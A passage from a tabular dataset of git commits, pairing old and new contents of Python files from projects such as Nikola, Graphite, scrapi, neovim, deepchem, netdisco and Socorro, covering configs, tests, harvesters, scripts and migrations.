commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13 values | lang stringclasses 23 values |
|---|---|---|---|---|---|---|---|---|
7b118afcc96edf335d5c259adc3e2065648ace6f | update site URL | abrahamvarricatt/abrahamvarricatt.github.io,abrahamvarricatt/abrahamvarricatt.github.io,abrahamvarricatt/abrahamvarricatt.github.io | conf.py | conf.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Data about this site
BLOG_AUTHOR = "chronodekar"
BLOG_TITLE = "Note To Self"
SITE_URL = "http://note2self.abraham-v.com/"
BLOG_EMAIL = "no@email.here"
BLOG_DESCRIPTION = "Snippets of information"
# Multi-lingual settings (Not used - keeping them blank)
DEFAULT_LANG = "en"
TRANSLATIONS = {
DEFAULT_LANG: "",
}
# Sidebar/Navigation
NAVIGATION_LINKS = {
DEFAULT_LANG: (
("/archive.html", "Archives"),
("/categories/index.html", "Tags"),
("/rss.xml", "RSS feed"),
),
}
# Theme settings
THEME = "bootstrap3"
THEME_COLOR = '#5670d4'
# POST/PAGE tuples
POSTS = (
("posts/*.rst", "posts", "post.tmpl"),
("posts/*.html", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.rst", "stories", "story.tmpl"),
("stories/*.html", "stories", "story.tmpl"),
)
TIMEZONE = "UTC+5:30"
# Mapping language with file extension
COMPILERS = {
"rest": ('.rst', '.txt'),
"html": ('.html', '.htm'),
}
WRITE_TAG_CLOUD = True
POSTS_SECTIONS = True
CATEGORY_ALLOW_HIERARCHIES = False
CATEGORY_OUTPUT_FLAT_HIERARCHY = False
FRONT_INDEX_HEADER = {
DEFAULT_LANG: '',
}
REDIRECTIONS = []
GITHUB_COMMIT_SOURCE = True
OUTPUT_FOLDER = 'output'
IMAGE_FOLDERS = {'images': 'images'}
GLOBAL_CONTEXT = {}
GLOBAL_CONTEXT_FILLER = []
COMMENT_SYSTEM = ""
COMMENT_SYSTEM_ID = ""
LICENSE = ""
CONTENT_FOOTER = 'Contents © {date} <a href="mailto:{email}">{author}</a> - Powered by<a href="https://getnikola.com" rel="nofollow">Nikola</a> {license}'
CONTENT_FOOTER_FORMATS = {
DEFAULT_LANG: (
(),
{
"email": BLOG_EMAIL,
"author": BLOG_AUTHOR,
"date": time.gmtime().tm_year,
"license": LICENSE,
}
)
}
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
# Data about this site
BLOG_AUTHOR = "chronodekar"
BLOG_TITLE = "Note To Self"
SITE_URL = "https://note2self-abrahamvarricatt.github.io/"
BLOG_EMAIL = "no@email.here"
BLOG_DESCRIPTION = "Snippets of information"
# Multi-lingual settings (Not used - keeping them blank)
DEFAULT_LANG = "en"
TRANSLATIONS = {
DEFAULT_LANG: "",
}
# Sidebar/Navigation
NAVIGATION_LINKS = {
DEFAULT_LANG: (
("/archive.html", "Archives"),
("/categories/index.html", "Tags"),
("/rss.xml", "RSS feed"),
),
}
# Theme settings
THEME = "bootstrap3"
THEME_COLOR = '#5670d4'
# POST/PAGE tuples
POSTS = (
("posts/*.rst", "posts", "post.tmpl"),
("posts/*.html", "posts", "post.tmpl"),
)
PAGES = (
("stories/*.rst", "stories", "story.tmpl"),
("stories/*.html", "stories", "story.tmpl"),
)
TIMEZONE = "UTC+5:30"
# Mapping language with file extension
COMPILERS = {
"rest": ('.rst', '.txt'),
"html": ('.html', '.htm'),
}
WRITE_TAG_CLOUD = True
POSTS_SECTIONS = True
CATEGORY_ALLOW_HIERARCHIES = False
CATEGORY_OUTPUT_FLAT_HIERARCHY = False
FRONT_INDEX_HEADER = {
DEFAULT_LANG: '',
}
REDIRECTIONS = []
GITHUB_COMMIT_SOURCE = True
OUTPUT_FOLDER = 'output'
IMAGE_FOLDERS = {'images': 'images'}
GLOBAL_CONTEXT = {}
GLOBAL_CONTEXT_FILLER = []
COMMENT_SYSTEM = ""
COMMENT_SYSTEM_ID = ""
LICENSE = ""
CONTENT_FOOTER = 'Contents © {date} <a href="mailto:{email}">{author}</a> - Powered by<a href="https://getnikola.com" rel="nofollow">Nikola</a> {license}'
CONTENT_FOOTER_FORMATS = {
DEFAULT_LANG: (
(),
{
"email": BLOG_EMAIL,
"author": BLOG_AUTHOR,
"date": time.gmtime().tm_year,
"license": LICENSE,
}
)
}
| mit | Python |
b2dd561322f6f277f470eae425028412a209da93 | Add Repository class and module | mcgid/morenines,mcgid/morenines | morenines/repository.py | morenines/repository.py | import os
from morenines import output
from morenines import util
from morenines.index import Index
from morenines.ignores import Ignores
NAMES = {
'repo_dir': '.morenines',
'index': 'index',
'ignore': 'ignore',
}
class Repository(object):
def __init__(self):
self.path = None
self.index = None
self.ignores = None
def open(self, path):
repo_dir_path = find_repo(path)
if not repo_dir_path:
output.error("Cannot find repository in '{}' or any parent dir".format(path))
util.abort()
self.path = repo_dir_path
self.index = Index.read(os.path.join(self.path, NAMES['index']))
self.ignores = Ignores.read(os.path.join(self.path, NAMES['ignore']))
def find_repo(start_path):
if start_path == '/':
return None
path = os.path.join(start_path, NAMES['repo_dir'])
if os.path.isdir(path):
return path
parent = os.path.split(start_path)[0]
return find_repo(parent)
| mit | Python | |
8273d67aaf74f4f05aa9c9fa86f710a937c708d4 | Test that submitting twice works | campbe13/openhatch,jledbetter/openhatch,eeshangarg/oh-mainline,nirmeshk/oh-mainline,vipul-sharma20/oh-mainline,sudheesh001/oh-mainline,mzdaniel/oh-mainline,heeraj123/oh-mainline,jledbetter/openhatch,openhatch/oh-mainline,ojengwa/oh-mainline,moijes12/oh-mainline,eeshangarg/oh-mainline,waseem18/oh-mainline,willingc/oh-mainline,vipul-sharma20/oh-mainline,openhatch/oh-mainline,campbe13/openhatch,ojengwa/oh-mainline,ojengwa/oh-mainline,eeshangarg/oh-mainline,moijes12/oh-mainline,SnappleCap/oh-mainline,eeshangarg/oh-mainline,waseem18/oh-mainline,sudheesh001/oh-mainline,SnappleCap/oh-mainline,jledbetter/openhatch,willingc/oh-mainline,jledbetter/openhatch,mzdaniel/oh-mainline,openhatch/oh-mainline,moijes12/oh-mainline,SnappleCap/oh-mainline,Changaco/oh-mainline,mzdaniel/oh-mainline,mzdaniel/oh-mainline,jledbetter/openhatch,eeshangarg/oh-mainline,mzdaniel/oh-mainline,heeraj123/oh-mainline,ojengwa/oh-mainline,Changaco/oh-mainline,sudheesh001/oh-mainline,heeraj123/oh-mainline,SnappleCap/oh-mainline,openhatch/oh-mainline,waseem18/oh-mainline,waseem18/oh-mainline,vipul-sharma20/oh-mainline,heeraj123/oh-mainline,ehashman/oh-mainline,ojengwa/oh-mainline,campbe13/openhatch,ehashman/oh-mainline,onceuponatimeforever/oh-mainline,willingc/oh-mainline,vipul-sharma20/oh-mainline,mzdaniel/oh-mainline,waseem18/oh-mainline,ehashman/oh-mainline,ehashman/oh-mainline,openhatch/oh-mainline,nirmeshk/oh-mainline,sudheesh001/oh-mainline,Changaco/oh-mainline,nirmeshk/oh-mainline,nirmeshk/oh-mainline,willingc/oh-mainline,heeraj123/oh-mainline,onceuponatimeforever/oh-mainline,nirmeshk/oh-mainline,campbe13/openhatch,vipul-sharma20/oh-mainline,onceuponatimeforever/oh-mainline,onceuponatimeforever/oh-mainline,moijes12/oh-mainline,SnappleCap/oh-mainline,Changaco/oh-mainline,Changaco/oh-mainline,campbe13/openhatch,ehashman/oh-mainline,willingc/oh-mainline,moijes12/oh-mainline,mzdaniel/oh-mainline,onceuponatimeforever/oh-mainline,sudheesh001/oh-mainline | mysite/profile/tests.py | mysite/profile/tests.py | import django.test
from search.models import Project
import twill
from twill import commands as tc
from twill.shell import TwillCommandLoop
from django.test import TestCase
from django.core.servers.basehttp import AdminMediaHandler
from django.core.handlers.wsgi import WSGIHandler
from StringIO import StringIO
# FIXME: Later look into http://stackoverflow.com/questions/343622/how-do-i-submit-a-form-given-only-the-html-source
# Functions you'll need:
def twill_setup():
app = AdminMediaHandler(WSGIHandler())
twill.add_wsgi_intercept("127.0.0.1", 8080, lambda: app)
def twill_teardown():
twill.remove_wsgi_intercept('127.0.0.1', 8080)
def make_twill_url(url):
# modify this
return url.replace("http://openhatch.org/",
"http://127.0.0.1:8080/")
def twill_quiet():
# suppress normal output of twill.. You don't want to
# call this if you want an interactive session
twill.set_output(StringIO())
class ProfileTests(django.test.TestCase):
def setUp(self):
twill_setup()
def tearDown(self):
twill_teardown()
def testSlash(self):
response = self.client.get('/profile/')
def testAddContribution(self):
url = 'http://openhatch.org/profile/'
tc.go(make_twill_url(url))
tc.fv('add_contrib', 'project', 'Babel')
tc.fv('add_contrib', 'contrib_text', 'msgctxt support')
tc.fv('add_contrib', 'url', 'http://babel.edgewall.org/ticket/54')
tc.submit()
# Assert that we are not in some weird GET place with
# CGI args
tc.url(r'^[^?]*$')
tc.find('Babel')
tc.fv('add_contrib', 'project', 'Baber')
tc.fv('add_contrib', 'contrib_text', 'msgctxt support')
tc.fv('add_contrib', 'url', 'http://babel.edgewall.org/ticket/54')
tc.submit()
# Verify that leaving and coming back has it still
# there
tc.go(make_twill_url(url))
tc.find('Babel')
tc.find('Baber')
| import django.test
from search.models import Project
import twill
from twill import commands as tc
from twill.shell import TwillCommandLoop
from django.test import TestCase
from django.core.servers.basehttp import AdminMediaHandler
from django.core.handlers.wsgi import WSGIHandler
from StringIO import StringIO
# FIXME: Later look into http://stackoverflow.com/questions/343622/how-do-i-submit-a-form-given-only-the-html-source
# Functions you'll need:
def twill_setup():
app = AdminMediaHandler(WSGIHandler())
twill.add_wsgi_intercept("127.0.0.1", 8080, lambda: app)
def twill_teardown():
twill.remove_wsgi_intercept('127.0.0.1', 8080)
def make_twill_url(url):
# modify this
return url.replace("http://openhatch.org/",
"http://127.0.0.1:8080/")
def twill_quiet():
# suppress normal output of twill.. You don't want to
# call this if you want an interactive session
twill.set_output(StringIO())
class ProfileTests(django.test.TestCase):
def setUp(self):
twill_setup()
def tearDown(self):
twill_teardown()
def testSlash(self):
response = self.client.get('/profile/')
def testAddContribution(self):
url = 'http://openhatch.org/profile/'
tc.go(make_twill_url(url))
tc.fv('add_contrib', 'project', 'Babel')
tc.fv('add_contrib', 'contrib_text', 'msgctxt support')
tc.fv('add_contrib', 'url', 'http://babel.edgewall.org/ticket/54')
tc.submit()
# Assert that we are not in some weird GET place with
# CGI args
tc.url(r'^[^?]*$')
tc.find('Babel')
# Verify that leaving and coming back has it still
# there
tc.go(make_twill_url(url))
tc.find('Babel')
| agpl-3.0 | Python |
292b3c99fc294f9855bd7eb26b0089a04a5f93b5 | Create match_x_y_repetitions.py | costincaraivan/hackerrank,costincaraivan/hackerrank | regex/repetitions/python3/match_x_y_repetitions.py | regex/repetitions/python3/match_x_y_repetitions.py | Regex_Pattern = r'^\d{1,2}[a-zA-z]{3,}\.{0,3}$' # Do not delete 'r'.
| mit | Python | |
f3c8d092b67ad16bdd0937651ef34e3d84b15e2b | Add coverage for composer's send_email function (#2174) | obfuscurity/graphite-web,graphite-project/graphite-web,criteo-forks/graphite-web,mcoolive/graphite-web,deniszh/graphite-web,mcoolive/graphite-web,deniszh/graphite-web,cbowman0/graphite-web,graphite-project/graphite-web,mcoolive/graphite-web,cbowman0/graphite-web,obfuscurity/graphite-web,obfuscurity/graphite-web,deniszh/graphite-web,criteo-forks/graphite-web,mcoolive/graphite-web,drax68/graphite-web,obfuscurity/graphite-web,cbowman0/graphite-web,graphite-project/graphite-web,drax68/graphite-web,obfuscurity/graphite-web,obfuscurity/graphite-web,deniszh/graphite-web,drax68/graphite-web,criteo-forks/graphite-web,mcoolive/graphite-web,mcoolive/graphite-web,graphite-project/graphite-web,criteo-forks/graphite-web,criteo-forks/graphite-web,cbowman0/graphite-web,drax68/graphite-web,graphite-project/graphite-web,deniszh/graphite-web,drax68/graphite-web,deniszh/graphite-web,cbowman0/graphite-web,drax68/graphite-web,graphite-project/graphite-web,criteo-forks/graphite-web,cbowman0/graphite-web | webapp/tests/test_composer.py | webapp/tests/test_composer.py | import mock
from urllib3.response import HTTPResponse
from graphite.util import BytesIO
from .base import TestCase
try:
from django.urls import reverse
except ImportError: # Django < 1.10
from django.core.urlresolvers import reverse
class ComposerTest(TestCase):
@mock.patch('six.moves.http_client.HTTPConnection.request')
@mock.patch('six.moves.http_client.HTTPConnection.getresponse')
@mock.patch('graphite.composer.views.SMTP')
@mock.patch('django.conf.settings.SMTP_SERVER', 'localhost')
def test_send_email(self, mock_smtp, http_response, http_request):
url = reverse('composer_send_email')
request = { "to": "noreply@localhost",
"url": 'https://localhost:8000/render?target=sumSeries(a.b.c.d)&title=Test&width=500&from=-55minutes&until=now&height=400'}
response = self.client.get(reverse('render'), {'target': 'test'})
self.assertEqual(response['Content-Type'], 'image/png')
data = response.content
responseObject = HTTPResponse(body=BytesIO(data), status=200, preload_content=False)
http_request.return_value = responseObject
http_response.return_value = responseObject
instance = mock_smtp.return_value
instance.sendmail.return_value = {}
response = self.client.get(url, request)
self.assertEqual(response.content, b'OK')
| apache-2.0 | Python | |
d06d7ea2a1aabb81be9be77c958b766a2ab0e1b3 | Reduce implicit waiting for visible elements | beanqueen/salad,salad/salad,salad/salad,beanqueen/salad | salad/steps/browser/finders.py | salad/steps/browser/finders.py | from lettuce import world
from salad.logger import logger
from salad.steps.parsers import pick_to_index
from splinter.exceptions import ElementDoesNotExist
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
ELEMENT_FINDERS = {
'named "(.*)"': "find_by_name",
'with(?: the)? id "(.*)"': "find_by_id",
'with(?: the)? css selector "(.*)"': "find_by_css",
'with(?: the)? value (.*)': "find_by_value",
}
LINK_FINDERS = {
'to "(.*)"': "find_link_by_href",
'to a url that contains "(.*)"': "find_link_by_partial_href",
'with(?: the)? text "(.*)"': "find_link_by_text",
'with text that contains "(.*)"': "find_link_by_partial_text",
}
ELEMENT_THING_STRING = "(?:element|thing|field|textarea|radio button|button|checkbox|label)"
LINK_THING_STRING = "link"
VISIBILITY_TIMEOUT = 1
def _get_visible_element(finder_function, pick, pattern, wait_time=VISIBILITY_TIMEOUT):
element = _get_element(finder_function, pick, pattern)
w = WebDriverWait(world.browser.driver, wait_time)
try:
w.until(lambda driver: element.visible)
except TimeoutException as e:
raise ElementDoesNotExist
return element
def _get_element(finder_function, pick, pattern):
ele = world.browser.__getattribute__(finder_function)(pattern)
index = pick_to_index(pick)
ele = ele[index]
if not "WebDriverElement" in "%s" % type(ele):
if len(ele) > 1:
logger.warn("More than one element found when looking for %s for %s. Using the first one. " % (finder_function, pattern))
ele = ele.first
world.current_element = ele
return ele
def _convert_pattern_to_css(finder_function, first, last, find_pattern, tag=""):
pattern = ""
if finder_function == "find_by_name":
pattern += "%s[name='%s']" % (tag, find_pattern, )
elif finder_function == "find_by_id":
pattern += "#%s" % (find_pattern, )
elif finder_function == "find_by_css":
pattern += "%s" % (find_pattern, )
elif finder_function == "find_by_value":
pattern += "%s[value='%s']" % (tag, find_pattern, ) # makes no sense, but consistent.
else:
raise Exception("Unknown pattern.")
if first:
pattern += ":first"
if last:
pattern += ":last"
return pattern
| from lettuce import world
from salad.logger import logger
from salad.steps.parsers import pick_to_index
from splinter.exceptions import ElementDoesNotExist
from selenium.webdriver.support.wait import WebDriverWait
from selenium.common.exceptions import TimeoutException
ELEMENT_FINDERS = {
'named "(.*)"': "find_by_name",
'with(?: the)? id "(.*)"': "find_by_id",
'with(?: the)? css selector "(.*)"': "find_by_css",
'with(?: the)? value (.*)': "find_by_value",
}
LINK_FINDERS = {
'to "(.*)"': "find_link_by_href",
'to a url that contains "(.*)"': "find_link_by_partial_href",
'with(?: the)? text "(.*)"': "find_link_by_text",
'with text that contains "(.*)"': "find_link_by_partial_text",
}
ELEMENT_THING_STRING = "(?:element|thing|field|textarea|radio button|button|checkbox|label)"
LINK_THING_STRING = "link"
VISIBILITY_TIMEOUT = 5
def _get_visible_element(finder_function, pick, pattern, wait_time=VISIBILITY_TIMEOUT):
element = _get_element(finder_function, pick, pattern)
w = WebDriverWait(world.browser.driver, wait_time)
try:
w.until(lambda driver: element.visible)
except TimeoutException as e:
raise ElementDoesNotExist
return element
def _get_element(finder_function, pick, pattern):
ele = world.browser.__getattribute__(finder_function)(pattern)
index = pick_to_index(pick)
ele = ele[index]
if not "WebDriverElement" in "%s" % type(ele):
if len(ele) > 1:
logger.warn("More than one element found when looking for %s for %s. Using the first one. " % (finder_function, pattern))
ele = ele.first
world.current_element = ele
return ele
def _convert_pattern_to_css(finder_function, first, last, find_pattern, tag=""):
pattern = ""
if finder_function == "find_by_name":
pattern += "%s[name='%s']" % (tag, find_pattern, )
elif finder_function == "find_by_id":
pattern += "#%s" % (find_pattern, )
elif finder_function == "find_by_css":
pattern += "%s" % (find_pattern, )
elif finder_function == "find_by_value":
pattern += "%s[value='%s']" % (tag, find_pattern, ) # makes no sense, but consistent.
else:
raise Exception("Unknown pattern.")
if first:
pattern += ":first"
if last:
pattern += ":last"
return pattern
| bsd-3-clause | Python |
c39c8955782c3015f30a9ef7f8e8783ac105ae70 | add harvester for dailyssrn: | fabianvf/scrapi,ostwald/scrapi,felliott/scrapi,alexgarciac/scrapi,CenterForOpenScience/scrapi,mehanig/scrapi,jeffreyliu3230/scrapi,CenterForOpenScience/scrapi,erinspace/scrapi,felliott/scrapi,mehanig/scrapi,fabianvf/scrapi,erinspace/scrapi | scrapi/harvesters/dailyssrn.py | scrapi/harvesters/dailyssrn.py | from __future__ import unicode_literals
from dateutil.parser import parse
# from datetime import date, timedelta
import furl
from lxml import etree
from scrapi import requests
# from scrapi import settings
from scrapi.base import XMLHarvester
from scrapi.linter import RawDocument
from scrapi.util import copy_to_unicode
from scrapi.base.helpers import compose, single_result
class DailyssrnHarvester(XMLHarvester):
short_name = 'dailyssrn'
long_name = 'RSS Feed from the Social Science Research Network'
url = 'http://papers.ssrn.com/'
schema = {
"description": ('//description/node()', compose(lambda x: x.strip(), single_result)),
"title": ('//title/node()', compose(lambda x: x.strip(), single_result)),
"providerUpdatedDateTime": ('//pubDate/node()', compose(lambda x: x.isoformat(), parse, lambda x: x.strip(), single_result)),
"contributors": '//contributors/node()',
"uris": {
"canonicalUri": ('//link/node()', compose(lambda x: x.strip(), single_result)),
}
}
def harvest(self, start_date=None, end_date=None):
url = 'http://dailyssrn.com/rss/rss-all-2.0.xml'
data = requests.get(url)
doc = etree.XML(data.content)
records = doc.xpath('channel/item')
xml_list = []
for record in records:
# import ipdb; ipdb.set_trace()
doc_id = parse_id_from_url(record.xpath('link/node()'))
record = etree.tostring(record)
xml_list.append(RawDocument({
'doc': record,
'source': self.short_name,
'docID': copy_to_unicode(doc_id),
'filetype': 'xml'
}))
return xml_list
def parse_id_from_url(url):
# import ipdb; ipdb.set_trace()
parsed_url = furl.furl(url[0])
return parsed_url.args['abstract_id']
| apache-2.0 | Python | |
6780fbbb526b999b967376cf03fc816cfbfe1122 | add is_lat_unit_matters.py | clarka34/exploring-ship-logbooks,clarka34/exploringShipLogbooks | scripts/is_lat_unit_matters.py | scripts/is_lat_unit_matters.py | """
is_lat_unit_matters.py
By Wedward Wei
After I explore the data, I found some interesting detail. Like we have differnt types of "LongitudeUnits"
I am wondering if the latitude data could be presented in differnt ways, so we meed more steps before plot.
So I wrote this code to see if the worry is necessary.
"""
import os
import sys
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
"""
If data is not ready, we need download the raw data and unzip the files in the same route
If data is ready, return the DataFrame
"""
def if_data_ready(filename):
if os.path.exists(filename):
print (filename+" already exist")
return pd.read_csv(filename)
else:
print (filename+" does not exist, please check the file")
sys.exit()
file_path = os.getcwd()+"\\data\\CLIWOC15.csv"
raw_data = if_data_ready(file_path)
# Show that we have differnt types of "LongitudeUnits"
print(pd.value_counts(raw_data["LongitudeUnits"]))
raw_data_360_1 = raw_data[raw_data["LongitudeUnits"]=="360 degrees"]
raw_data_360_2 = raw_data[raw_data["LongitudeUnits"]=="360 GRADOS"]
raw_data_180_1 = raw_data[raw_data["LongitudeUnits"]=="180 degrees"]
raw_data_180_2 = raw_data[raw_data["LongitudeUnits"]=="180 GRADOS"]
position_1 = raw_data_360_1[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
position_2 = raw_data_360_2[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
position_3 = raw_data_180_1[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
position_4 = raw_data_180_2[pd.notnull(raw_data["Lat3"])][pd.notnull(raw_data["Lon3"])][["Lat3","Lon3"]]
#Output the 1st type of image
position_list = list(zip(position_1["Lat3"],position_1["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list[:10000]: ##MAX=62324
plt.scatter(i[1], i[0],s=15, alpha=.2)
plt.savefig('360_1.png')
#Output the 2nd type of image
plt.clf() #clear the cache
position_list = list(zip(position_2["Lat3"],position_2["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list[:10000]: ##MAX=16450
plt.scatter(i[1], i[0],s=8, alpha=.2)
plt.savefig('360_2.png')
#Output the 3rd type of image
plt.clf() #clear the cache
position_list = list(zip(position_3["Lat3"],position_3["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list[:10000]: ##MAX=136133
plt.scatter(i[1], i[0],s=8, alpha=.2)
plt.savefig('180_1.png')
#Output the 4nd type of image
plt.clf() #clear the cache
position_list = list(zip(position_4["Lat3"],position_4["Lon3"]))
plt.figure(figsize=(30, 15))
plt.xlim(-180,180)
plt.ylim(-70,60)
for i in position_list: ##MAX=1781
plt.scatter(i[1], i[0],s=15, alpha=.2)
plt.savefig('180_2.png')
"""
After comparing the 4 images, we can reach the preliminary conclusion that,
the value in column "LongitudeUnits" does not affect the column "Lat3", so
we can use the data in Lat3" and "Lon3" directly.
""" | mit | Python | |
118627a170e3ba3cf8863b3bb0cdaf9b5e0441ff | Create monte_carlo_sliced_doughnut.py | rupertsmall/numerical-tools,rupertsmall/numerical-tools | monte_carlo_sliced_doughnut.py | monte_carlo_sliced_doughnut.py | #center of mass of a sliced doughnut
from random import random
from math import pi,sin,cos,atan
M=100000000 #number of samples
y_samples = 0 #samples which have been in correct y range
x_samples = 0 #samples which have been in correct x range
#do something random
def rand_r():
return random()
def rand_theta():
return pi*random() - pi/2
def rand_phi():
return 2*pi*random()
def x_is_in(r, theta, phi): #check that x value is in correct domain
x = (3+r*cos(phi))*cos(theta)
if x>=1:
return True
else:
return False
def y_is_in(r, theta, phi): #check that y value is in correct domain
y = (3+r*cos(phi))*sin(theta)
if y>=-3:
return True
else:
return False
#main function. N is the number of evaluations to make (at random points) withing the sliced doughnut
def monte_carlo(N):
i=0
actual_sample_size = 0
x=y=0
while i<=N:
r = rand_r()
theta = rand_theta()
phi = rand_phi()
if x_is_in(r, theta, phi) and y_is_in(r, theta, phi):
#print (3+r*cos(phi))*cos(theta), (3+r*cos(phi))*sin(theta), r*sin(phi) #temporary: to plot coordinates
x += (3+r*cos(phi))*cos(theta)
y += (3+r*cos(phi))*sin(theta)
actual_sample_size += 1
i +=1
print 'center of mass in x: ',x/float(actual_sample_size)
print 'center of mass in y: ',y/float(actual_sample_size)
print 'number of sample points: ',float(actual_sample_size)
monte_carlo(M)
| mit | Python | |
e74f78a663a8467e19d071d8e68ef11689c0b7ec | Add replay.py | haypo/perf,vstinner/pyperf | perf/tests/replay.py | perf/tests/replay.py | from __future__ import division, print_function, absolute_import
import os
import perf
import tempfile
def get_raw_values(filename, run_id):
bench = perf.Benchmark.load(filename)
run = bench.get_runs()[run_id]
inner_loops = run._get_inner_loops()
raw_values = [value * (loops * inner_loops)
for loops, value in run.warmups]
total_loops = run.get_total_loops()
raw_values.extend(value * total_loops for value in run.values)
return (run, raw_values)
class Replay(object):
def __init__(self, runner, filename):
self.runner = runner
self.args = runner.args
self.filename = filename
self.value_id = 0
self.init()
def init(self):
args = runner.args
if args.worker:
self.read_session()
run, self.raw_values = get_raw_values(self.filename, self.run_id)
args.loops = run._get_loops()
# FIXME: handle inner_loops
self.run_id += 1
self.write_session()
else:
args.session_filename = tempfile.mktemp()
self.run_id = self.args.first_run - 1
self.write_session()
def read_session(self):
filename = self.args.session_filename
with open(filename, "r") as fp:
line = fp.readline()
self.run_id = int(line.rstrip())
def write_session(self):
filename = self.args.session_filename
with open(filename, "w") as fp:
print(self.run_id, file=fp)
fp.flush()
def time_func(self, loops):
raw_value = self.raw_values[self.value_id]
self.value_id += 1
return raw_value
def add_cmdline_args(cmd, args):
cmd.append(args.filename)
if args.session_filename:
cmd.extend(('--session-filename', args.session_filename))
runner = perf.Runner(add_cmdline_args=add_cmdline_args)
runner.argparser.add_argument('filename')
runner.argparser.add_argument('--session-filename')
runner.argparser.add_argument('--first-run', type=int, default=1)
args = runner.parse_args()
replay = Replay(runner, args.filename)
runner.bench_time_func('bench', replay.time_func)
if not args.worker:
os.unlink(args.session_filename)
| mit | Python | |
e8561caeb3c95633e99f540965d33a67046df3e5 | Add __init__ module for the `msgpack_rpc` subpackage | Shougo/python-client,traverseda/python-client,traverseda/python-client,Shougo/python-client,0x90sled/python-client,fwalch/python-client,meitham/python-client,meitham/python-client,bfredl/python-client,brcolow/python-client,zchee/python-client,starcraftman/python-client,fwalch/python-client,neovim/python-client,timeyyy/python-client,0x90sled/python-client,starcraftman/python-client,neovim/python-client,brcolow/python-client,zchee/python-client,bfredl/python-client,timeyyy/python-client | neovim/msgpack_rpc/__init__.py | neovim/msgpack_rpc/__init__.py | """Msgpack-rpc subpackage.
This package implements a msgpack-rpc client. While it was designed for
handling some Nvim particularities(server->client requests for example), the
code here should work with other msgpack-rpc servers.
"""
from .async_session import AsyncSession
from .event_loop import EventLoop
from .msgpack_stream import MsgpackStream
from .session import Session
__all__ = ('tcp_session', 'socket_session', 'stdio_session', 'spawn_session')
def session(transport_type='stdio', *args, **kwargs):
loop = EventLoop(transport_type, *args, **kwargs)
msgpack_stream = MsgpackStream(loop)
async_session = AsyncSession(msgpack_stream)
session = Session(async_session)
return session
def tcp_session(address, port=7450):
"""Create a msgpack-rpc session from a tcp address/port."""
return session('tcp', address, port)
def socket_session(path):
"""Create a msgpack-rpc session from a unix domain socket."""
return session('socket', path)
def stdio_session():
"""Create a msgpack-rpc session from stdin/stdout."""
return session('stdio')
def spawn_session(argv):
"""Create a msgpack-rpc session from a new Nvim instance."""
return session('spawn', argv)
| apache-2.0 | Python | |
92cb3088d63ff6fc511c01d1d151f1f1857df496 | create smiles tokenizer unit test | lilleswing/deepchem,peastman/deepchem,deepchem/deepchem,lilleswing/deepchem,peastman/deepchem,deepchem/deepchem,lilleswing/deepchem | deepchem/feat/tests/test_smiles_tokenizer.py | deepchem/feat/tests/test_smiles_tokenizer.py | # Requriments - transformers, tokenizers
from unittest import TestCase
from deepchem.feat.smiles_tokenizer import SmilesTokenizer
from transformers import RobertaForMaskedLM
class TestSmilesTokenizer(TestCase):
"""Tests the SmilesTokenizer to load the USPTO vocab file and a ChemBERTa Masked LM model with pre-trained weights.."""
def test_featurize(self):
from rdkit import Chem
smiles = ["Cn1c(=O)c2c(ncn2C)n(C)c1=O", "CC(=O)N1CN(C(C)=O)C(O)C1O"]
mols = [Chem.MolFromSmiles(smile) for smile in smiles]
featurizer = dc.feat.one_hot.OneHotFeaturizer(dc.feat.one_hot.zinc_charset)
one_hots = featurizer.featurize(mols)
untransformed = featurizer.untransform(one_hots)
assert len(smiles) == len(untransformed)
for i in range(len(smiles)):
assert smiles[i] == untransformed[i][0]
| mit | Python | |
97d455da87d3175c1d5cf2ce3091f26184cf4a10 | Add heos discoverable (#250) | balloob/netdisco | netdisco/discoverables/heos.py | netdisco/discoverables/heos.py | """Discover Heos devices."""
from . import SSDPDiscoverable
class Discoverable(SSDPDiscoverable):
"""Add support for discovering DLNA services."""
def get_entries(self):
"""Get all the HEOS devices."""
return self.find_by_st("urn:schemas-denon-com:device:ACT-Denon:1")
| mit | Python | |
b90e3b0bce680154d7fea8ed071f740db963c402 | fix bug 1458641: fix reports-clean crontabber app | lonnen/socorro,lonnen/socorro,mozilla/socorro,lonnen/socorro,mozilla/socorro,lonnen/socorro,mozilla/socorro,mozilla/socorro,mozilla/socorro,mozilla/socorro | alembic/versions/e70541df7ed7_bug_1458641_fix_reports_clean.py | alembic/versions/e70541df7ed7_bug_1458641_fix_reports_clean.py | """bug 1458641 fix reports clean crontabber app
Revision ID: e70541df7ed7
Revises: 3474e98b321f
Create Date: 2018-05-02 18:20:19.064954
"""
from alembic import op
from socorro.lib.migrations import load_stored_proc
# revision identifiers, used by Alembic.
revision = 'e70541df7ed7'
down_revision = '3474e98b321f'
def upgrade():
# Note: This should have been done in migration 3474e98b321f.
load_stored_proc(op, ['001_update_reports_clean.sql'])
def downgrade():
pass
| mpl-2.0 | Python | |
7573a76a05e5c282cdad74b542d191dd8c90d8ab | Add OvfTransportTestCase.py | Awingu/open-ovf,Awingu/open-ovf,Awingu/open-ovf,Awingu/open-ovf | py/tests/OvfTransportTestCase.py | py/tests/OvfTransportTestCase.py | #!/usr/bin/python
# vi: ts=4 expandtab syntax=python
##############################################################################
# Copyright (c) 2008 IBM Corporation
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Dave Leskovec (IBM) - initial implementation
##############################################################################
"""
